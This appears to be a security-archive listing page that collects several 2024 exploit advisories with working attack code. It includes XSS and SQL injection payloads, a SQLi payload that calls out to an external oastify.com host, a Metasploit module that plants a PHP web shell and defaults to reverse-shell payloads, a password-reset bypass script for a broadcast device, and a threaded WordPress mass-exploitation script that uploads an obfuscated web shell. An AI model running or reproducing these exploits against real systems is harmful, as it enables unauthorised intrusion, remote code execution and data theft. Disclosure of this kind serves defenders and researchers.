DerbyNet version 9.0 suffers from a cross site scripting vulnerability in checkin.php.

CVE ID: CVE-2024-30924

Description:  
A Cross Site Scripting (XSS) vulnerability has been identified in DerbyNet version 9.0, specifically within the `checkin.php` component. This vulnerability allows remote attackers to execute arbitrary code due to improper handling of the `order` URL parameter. The flaw lies in the way the `order` parameter is embedded directly into a JavaScript variable assignment without adequate sanitization or encoding, making it possible to inject scripts.

Vulnerability Type: Cross Site Scripting (XSS)

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: checkin.php

Attack Type: Remote

Impact: Code execution is possible as a result of this vulnerability.

Attack Vectors:  
The XSS vulnerability can be exploited by manipulating the `order` parameter in the URL. For example:  
- `http://127.0.0.1:8000/checkin.php?order=</script><script>alert(1)</script>`  
- `http://127.0.0.1:8000/checkin.php?order=';alert(1);//`

These attack vectors demonstrate how an attacker could inject and execute arbitrary JavaScript within the context of the user's browser session.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 checkin.php Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in photo.php.

    CVE ID: CVE-2024-30921Description:A Cross-Site Scripting (XSS) vulnerability has been identified in DerbyNet version 9.0, specifically affecting the photo.php component. This vulnerability allows remote attackers to execute arbitrary code via crafted URLs, without requiring authentication.Vulnerability Type: Cross-Site Scripting (XSS)Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynetAffected Product Code Base: DerbyNet - v9.0Affected Component: photo.phpAttack Type: RemoteImpact: Code executionAttack Vectors: The vulnerability can be exploited by navigating to a specially crafted URL such as:- http://127.0.0.1:8000/photo.php/<img src=x onerror=alert(1)>This method allows the attacker to inject arbitrary JavaScript that will be executed in the context of the victim's browser.Discoverer: Valentin LobsteinReferences:- Official website: http://derbynet.com- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 photo.php Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in render-document.php.

    CVE ID: CVE-2024-30920Description:A Cross Site Scripting (XSS) vulnerability has been identified in DerbyNet v9.0, specifically within the `render-document.php` component. This vulnerability allows a remote attacker to execute arbitrary code via crafted URLs. The root cause of the vulnerability is the application's failure to properly sanitize user input in document rendering paths, which permits the injection of malicious scripts.Vulnerability Type: XSS (Cross Site Scripting)Vendor of Product:DerbyNet - https://github.com/jeffpiazza/derbynetAffected Product Code Base:DerbyNet - v9.0Affected Component:render-document.phpAttack Type:RemoteImpact:Code executionRoot Cause:The vulnerability arises from the application's display of debug information, including `ORIG_SCRIPT_FILENAME`, `DOCUMENT_URI`, `SCRIPT_NAME`, and `PHP_SELF`. These debug outputs improperly handle user-supplied input by not sanitizing it before inclusion in the output, leading directly to XSS vulnerabilities when malicious inputs are rendered by the browser.Attack Vectors:The vulnerability can be exploited with URLs such as:- `http://127.0.0.1:8000/render-document.php/racer/<img src=x onerror=alert(1)>`- `http://127.0.0.1:8000/render-document.php/<img src=x onerror=alert(1)>`Discoverer:Valentin LobsteinReferences:- http://derbynet.com- https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 render-document.php Cross Site Scripting

Seo Panel version 4.7.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Seo Panel 4.7.0 Reflected XSS# Exploit Author: Arzu DEMÝREZ# Date: 05.03-2024# Vendor Homepage: https://www.seopanel.org/# Software Link:  https://github.com/seopanel/Seo-Panel/releases/tag/4.7.0# Version: Seo Panel 4.7.0-Description: A cross-site scripting (XSS) issue in the SEO admin login panel version 4.7.0 allows remote attackers to inject JavaScript.- used:x" onmouseover=alert(document.cookie) x="Review Of Analysis:Ýn archive.ctp.php file include search_form and search_name input load on that script at line 71 as<a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a>because of that an attacker if send that codex" onmouseover=alert(document.cookie) x="can exploit the victim.<form id='search_form'>    <table width="100%" class="search">        <tr>            <th><?php echo $spText['common']['Name']?>: </th>            <td>                <input type="text" name="search_name" value="<?php echo htmlentities($searchInfo['search_name'], ENT_QUOTES)?>" onblur="<?php echo $submitLink?>">            </td>            <th><?php echo $spText['common']['Period']?>:</th>            <td colspan="2">                <input type="text" value="<?php echo $fromTime?>" name="from_time" id="from_time_summary"/>                <input type="text" value="<?php echo $toTime?>" name="to_time" id="to_time_summary"/>                <script>                  $( function() {                    $( "#from_time_summary, #to_time_summary").datepicker({dateFormat: "yy-mm-dd"});                  } );                </script>            </td>        <tr>        <tr>            <th><?php echo $spText['common']['Website']?>: </th>            <td>                <select name="website_id" id="website_id"  onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 180px;">                    <option value="">-- <?php echo $spText['common']['Select']?> --</option>                    <?php foreach($siteList as $websiteInfo){?>                        <?php if($websiteInfo['id'] == $websiteId){?>                            <option value="<?php echo $websiteInfo['id']?>" selected><?php echo $websiteInfo['name']?></option>                        <?php }else{?>                            <option value="<?php echo $websiteInfo['id']?>"><?php echo $websiteInfo['name']?></option>                        <?php }?>                    <?php }?>                </select>            </td>            <th><?php echo $spText['label']['Report Type']?>: </th>            <td>                <select name="report_type" id="report_type" onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 210px;">                    <option value="">-- <?php echo $spText['common']['Select']?> --</option>                    <?php foreach($reportTypes as $type => $info){?>                        <?php if($type == $searchInfo['report_type']){?>                            <option value="<?php echo $type?>" selected><?php echo $info?></option>                        <?php }else{?>                            <option value="<?php echo $type?>"><?php echo $info?></option>                        <?php }?>                    <?php }?>                </select>                <a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a>Saygýlarýmla / Best Regards,[cid:e33e203c-58cd-46ba-b1ea-f27e999dc68d]

Seo Panel 4.7.0 Cross Site Scripting

Human Resource Management System 2024 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: hrm2024.1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 04/02/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The cityedit parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'was submitted in the cityedit parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system by using thisvulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: cityedit (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(selectload_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+''ELSE 0x28 END)) AND 'GMzs'='GMzs    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT(ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK    Type: time-based blind    Title: MySQL > 5.0.12 AND time-based blind (heavy query)    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR1) AND 'Jtnd'='Jtnd---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/hrm-2024.1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/hrm202410-multiple-sqli.html)## Time spent:01:15:00

Human Resource Management System 2024 1.0 SQL Injection

Jasmin Ransomware version 1.1 suffers from an arbitrary file read vulnerability.

    # Exploit Title: Jasmin Ransomware arbitrary file read# Date: 2024-04-04# Exploit Author: @_chebuya# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware# Version: v1.1# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30851# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/mainimport requestsimport argparseimport osfrom bs4 import BeautifulSoupdef get_file(jasmin_url, filepath):    response = requests.get(        f'{jasmin_url}/download_file.php?file={filepath}',        allow_redirects=False    )    return response.textdef get_keys(jasmin_url):    headers = {        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',    }    data = "username=&password='+or+1%3D1+--+-&service=login"    login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)    cookies = login_req.cookies    list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)    soup = BeautifulSoup(list_req.text, 'html.parser')    rows = soup.find_all('tr')    print(f"Dumping decryption keys from {len(rows)-1} victims")    for row in rows:        data = row.find_all('td')        if len(data) == 0:            continue                username = data[1].get_text()        hostname = data[0].get_text()        filepath = data[7].find('a')['href'].split("=")[1]        print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")subparser = parser.add_subparsers(dest='subcommand')file_parser = subparser.add_parser("getfile", help="Read a file off the server")file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")args = parser.parse_args()if args.subcommand != None:    target_url = args.url.rstrip("/")if args.subcommand == "getkeys":    get_keys(target_url)elif args.subcommand == "getfile":    target_file = args.file.replace("\\", "/").replace("c:", "")    target_path = os.path.join("../../../../../../../../../", target_file)    print(get_file(target_url, target_path))else:    parser.print_help()

Jasmin Ransomware 1.1 Arbitrary File Read

A remote code execution vulnerability in Gibbon online school platform version 26.0.00 and lower allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the endpoint /modules/System%20Admin/import_run.php&type=externalAssessment&step=4. As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Gibbon School Platform Authenticated PHP Deserialization Vulnerability',        'Description' => %q{          A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower          allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a          POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.          As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,          potentially resulting in complete system compromise, data exfiltration, or unauthorized access          to sensitive information.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Ali Maharramli', # SecondX.io Research Team - discovery of the vulnerability          'Fikrat Guliev', # SecondX.io Research Team - discovery of the vulnerability          'Islam Rzayev' # SecondX.io Research Team - discovery of the vulnerability        ],        'References' => [          ['CVE', '2024-24725'],          ['URL', 'https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725'],          ['PACKETSTORM', '177635'],          ['EDB', '51903']        ],        'DisclosureDate' => '2024-03-18',        'Platform' => ['php', 'unix', 'linux', 'win'],        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => false,        'Targets' => [          [            'PHP',            {              'Platform' => ['php'],              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],              'Linemax' => 16384,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :windows_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :windows_dropper,              'Linemax' => 16384,              'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]),      OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),      OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address']),      OptString.new('PASSWORD', [true, 'Password'])    ])  end  def gibbon_login    # construct multipart login form data    form_data = Rex::MIME::Message.new    form_data.add_part('', nil, nil, 'form-data; name="address"')    form_data.add_part('default', nil, nil, 'form-data; name="method"')    form_data.add_part(datastore['USERNAME'].to_s, nil, nil, 'form-data; name="username"')    form_data.add_part(datastore['PASSWORD'].to_s, nil, nil, 'form-data; name="password"')    form_data.add_part('025', nil, nil, 'form-data; name="gibbonSchoolYearID"')    form_data.add_part('0002', nil, nil, 'form-data; name="gibboni18nID"')    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'login.php?timeout=true'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def construct_form_data(payload)    # construct multipart form data with payload    payload_len = payload.length    payload_data = "a:2:{i:7;O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"\x00*\x00socket\";O:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"\x00*\x00handler\";r:3;s:13:\"\x00*\x00bufferSize\";i:-1;s:9:\"\x00*\x00buffer\";a:1:{i:0;a:2:{i:0;s:#{payload_len}:\"#{payload}\";s:5:\"level\";N;}}s:8:\"\x00*\x00level\";N;s:14:\"\x00*\x00initialized\";b:1;s:14:\"\x00*\x00bufferLimit\";i:-1;s:13:\"\x00*\x00processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}i:7;i:7;}"    form_data = Rex::MIME::Message.new    form_data.add_part('/modules/System Admin/import_run.php', nil, nil, 'form-data; name="address"')    form_data.add_part('sync', nil, nil, 'form-data; name="mode"')    form_data.add_part('N', nil, nil, 'form-data; name="syncField"')    form_data.add_part('', nil, nil, 'form-data; name="syncColumn"')    form_data.add_part(payload_data.to_s, nil, nil, 'form-data; name="columnOrder"')    form_data.add_part('N;', nil, nil, 'form-data; name="columnText"')    form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')    form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')    form_data.add_part("#{Rex::Text.rand_text_alpha(8..16)}.xlsx", nil, nil, 'form-data; name="filename"')    form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"')    form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"')    form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"')    return form_data  end  def upload_webshell(b64_payload)    # randomize file name if option WEBSHELL is not set    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")    # create webshell with base64 encoded PHP payload    # works for both windows and linux targets    php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}"    form_data = construct_form_data(php_payload)    # upload webshell    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    res = upload_webshell(payload)    fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200    register_file_for_cleanup(@webshell_name)    # execute webshell    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, @webshell_name),      'keep_cookies' => true    })  end  def execute_command(cmd, _opts = {})    form_data = construct_form_data(cmd)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def check    print_status("Checking if #{peer} can be exploited.")    res = send_request_cgi!({      'method' => 'GET',      'ctype' => 'application/x-www-form-urlencoded',      'uri' => normalize_uri(target_uri.path)    })    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200    # check if target is running the Gibbon online school platform    # search for the Gibbon version on the login page    return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon')    # trying to get the version    version = res.body.match(/Gibbon.*v(\d+\.\d+\.\d+)/)    version_number = version[0].split('v') unless version.nil?    if version_number      if Rex::Version.new(version_number[1]) <= Rex::Version.new('26.0.00')        return CheckCode::Appears("Gibbon v#{version_number[1]}")      else        return CheckCode::Safe("Gibbon v#{version_number[1]}")      end    end    CheckCode::Detected  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    res = gibbon_login    fail_with(Failure::NoAccess, "Login failed with user #{datastore['USERNAME']} and password #{datastore['PASSWORD']}.") unless res && res.code == 302    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd, :windows_cmd      execute_command(payload.encoded)    when :linux_dropper, :windows_dropper      # don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

Gibbon School Platform 26.0.00 Remote Code Execution

The Positron Broadcast Digital Signal Processor TRA7005 version 1.20 suffers from an authentication bypass through a direct and unauthorized access to the password management functionality. The vulnerability allows attackers to bypass Digest authentication by manipulating the password endpoint _Passwd.html and its payload data to set a user's password to arbitrary value or remove it entirely. This grants unauthorized access to protected areas (/user, /operator, /admin) of the application without requiring valid credentials, compromising the device's system security.

    #!/usr/bin/env python# -*- coding: utf-8 -*-### Positron Broadcast Signal Processor TRA7005 v1.20 _Passwd Exploit### Vendor: Positron srl# Product web page: https://www.positron.it#                   https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/# Affected version: 1.20#                   TRA7K5_REV107#                   TRA7K5_REV106#                   TRA7K5_REV104#                   TRA7K5_REV102## Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to# guarantee an excellent quality-price ratio in compliance with current regulations and# intended for individual broadcasters or radio networks. All models in the TRA7000 series# are fully digital, using only high-quality components such as 24-bit A/D and D/A converters# and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output# MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper# for both analogue and digital audio inputs, change-over emergency switching between any# input with adjustable thresholds and intervention times, both in the switching phase on# the secondary source and in the return phase to the primary source. Ethernet connection# with Web-Server (optional) for total control and management of the device. Advanced BYPASS# system between MPX input and outputs, active on operating and power supply anomalies and# can also be activated remotely.## Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication# bypass through a direct and unauthorized access to the password management functionality.# The vulnerability allows attackers to bypass Digest authentication by manipulating the# password endpoint _Passwd.html and its payload data to set a user's password to arbitrary# value or remove it entirely. This grants unauthorized access to protected areas (/user,# /operator, /admin) of the application without requiring valid credentials, compromising# the device's system security.## Tested on: Positron Web Server### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2024-5813# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php### 22.03.2024##import requests,sysprint("""______________________________________┏┳┓•      ┏┓            ┓  ┏┓    ┓  •  ┃ ┓┏┓┓┏  ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫  ┣ ┓┏┏┓┃┏┓┓╋ ┻ ┗┛┗┗┫  ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻  ┗┛┛┗┣┛┗┗┛┗┗       ┛                       ┛                 for   Positron Digital Signal Processor             ZSL-2024-5813______________________________________""")if len(sys.argv) != 4:    print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>")    sys.exit(1)ip = sys.argv[1]ut = sys.argv[2]wa = sys.argv[3]valid_ut = ['user', 'oper', 'admin']if ut.lower() not in valid_ut:    print("Invalid user type! Use 'user', 'oper', or 'admin'.")    sys.exit(1)url = f'http://{ip}/_Passwd.html'did = f'http://{ip}/_Device.html'try:    r = requests.get(did)    if r.status_code == 200 and 'TRA7K5' in r.text:        print("Vulnerable processor found!")    else:        print("Not Vulnerable or not applicable. Exploit exiting.")        sys.exit(1)except requests.exceptions.RequestException as e:    print(f"Error checking device: {e}")    sys.exit(1)headers = {    'Content-Type'   : 'application/x-www-form-urlencoded',    'Accept-Language': 'mk-MK,en;q=0.6',    'Accept-Encoding': 'gzip, deflate',    'User-Agent'     : 'R-Marina/11.9',    'Accept'         : '*/*'}payload = {}if wa.lower() == 'erase':    payload[f'PSW_{ut.capitalize()}'] = 'NONE'else:    payload_key = f'PSW_{ut.capitalize()}'    payload[payload_key] = wa    #print(payload)r = requests.post(url, headers=headers, data=payload)print(r.status_code)print(r.text)

Positron Broadcast Signal Processor TRA7005 1.20 Authentication Bypass

User Registration and Login and User Management System version 3.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: User Registration & Login and User Management System v3.2 - SQL Injection (Unauthenticated)# Exploit Author: Yusuf DİNÇ# Google Dork: NA# Date: 05/03/2024# Vendor Homepage: https://phpgurukul.com# Software Link:https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/# Version: 3.2# Tested on: LinuxPOST /test/loginsystem/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 53Origin: http://localhostConnection: closeReferer: http://localhost/test/loginsystem/login.phpCookie: csrftoken=WYNmntI3xnkUlg89ElNUCBp6mFVAZel8; sessionid=t5apbvw2jdnur3uvudxt8mcn7cdudbi5; PHPSESSID=1mnimk5b1591oukpi0kh90n0hvUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1uemail=test%40gmail.com'+OR+1=1#&password=test&login=

User Registration And Login And User Management System 3.2 SQL Injection

WordPress Membership for WooCommerce plugin versions prior to 2.1.7 suffer from a remote shell upload vulnerability.

    # Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)# Date: 2024-02-25# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sys , requests, re , jsonfrom multiprocessing.dummy import Poolfrom colorama import Forefrom colorama import initinit(autoreset=True)headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0','Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, likeGecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','Accept-Encoding': 'gzip, deflate', 'Accept-Language':'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}uploader = """GIF89a<?php ?><!DOCTYPE html><html><head>  <title>Resultz</title></head><body><h1>Uploader</h1>  <form enctype='multipart/form-data' action='' method='POST'>    <p>Uploaded</p>    <input type='file' name='uploaded_file'></input><br />    <input type='submit' value='Upload'></input>  </form></body></html><?PHPif(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echobase64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echobase64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>"""requests.urllib3.disable_warnings()def Exploit(Domain):    try:        if 'http' in Domain:          Domain = Domain        else:          Domain = 'http://'+Domain        myup = {'': ('db.php', uploader)}        req = requests.post(Domain +'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',files=myup, headers=headers,verify=False, timeout=10).text        req1 = requests.get(Domain +'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')        if 'Ex3ptionaL' in req1:          print (fg+'[+] '+ Domain + ' --> Shell Uploaded')          open('Shellz.txt', 'a').write(Domain +'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')        else:          print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')    except:        print(fr+' -| ' + Domain + ' --> {} [Failed]')target = open(input(fm+"Site List: "), "r").read().splitlines()mp = Pool(int(input(fm+"Threads: ")))mp.map(Exploit, target)mp.close()mp.join()

Tag

#php